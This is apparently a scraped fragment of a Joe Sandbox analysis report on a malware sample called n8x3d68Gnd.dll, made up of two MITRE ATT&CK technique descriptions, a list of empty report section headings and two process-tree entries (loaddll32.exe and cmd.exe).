Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report n8x3d68Gnd.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Exports

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: loaddll32.exe PID: 6996 Parent PID: 6064

General

Analysis Process: cmd.exe PID: 7024 Parent PID: 6996